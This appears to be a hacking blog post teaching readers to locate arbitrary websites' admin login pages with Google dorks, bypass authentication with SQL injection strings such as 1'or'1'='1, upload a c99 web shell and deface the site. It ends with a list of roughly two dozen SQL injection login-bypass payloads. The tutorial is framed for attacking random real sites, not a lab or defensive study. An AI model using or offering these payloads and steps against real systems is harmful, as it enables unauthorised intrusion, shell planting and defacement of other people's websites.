SQL Injection and Google dorks

Sql injection can be done by using various tools like Acunetix, SQL helper, Havij. In one of my past tutorials I showed you how havij is used by the hackers to scan a website for vulnerability and then take advantage of the loop hole and gain access to the website. There are various methods of this technique and In this tutorial I will be describing a very basic and simple Structured Query Language Injection (SQLi). Aside from this let me also tell that SQL injection technique  is widely used by hackers. I am of the perception that 70% of the hacks on websites are done with SQL injection. In this tutorial we will come to know how to find the website’s admin panel using a simple google dork and a SQL query to bypass the admin user name and password and enter into the panel. When we enter into the admin panel what we have to do is to find a file upload option and just upload a shell there like c99 shell etc. and finally deface the same.

                                   Click Here to Download DORKS




By entering these dorks many of the sites will open up having /adminlogin.aspx in their URL.
 Select any website, you will get the admin panel of the said website. 
Fill the details as: 

User: 1'or'1'='1

Password: 1'or'1'='1 

Using the above mentioned login details and you will enter  into the admin panel of a website.It will not work for all the websites but this is what is called a basic sql injection?


Other injection queries like this:

‘ or 1=1 –
1'or’1'=’1
 admin’–
 ” or 0=0 –
 or 0=0 –
‘ or 0=0 #
” or 0=0 #
 or 0=0 #
‘ or ‘x’='x
” or “x”=”x
 ‘) or (‘x’='x
 ‘ or 1=1–
” or 1=1–
 or 1=1–
‘ or a=a–
 ” or “a”=”a
 ‘) or (‘a’='a
“) or (“a”=”a
 hi” or “a”=”a
 hi” or 1=1 –
 hi’ or 1=1 –
 hi’ or ‘a’='a
 hi’) or (‘a’='a
 hi”) or (“a”=”)


Hope you enjoyed this
Please subscribe or give a thumbs up if there is anything you want me to write or do a tutorial about please send me an email 
I am doing more useful tips and tutorials everyday so please come by to see if there is anything new when I get enough followers and views I will be giving out free stuff

Comments

Popular posts from this blog

Hacking with Kali linux ( Pdf download)

How to exploit sites through RFI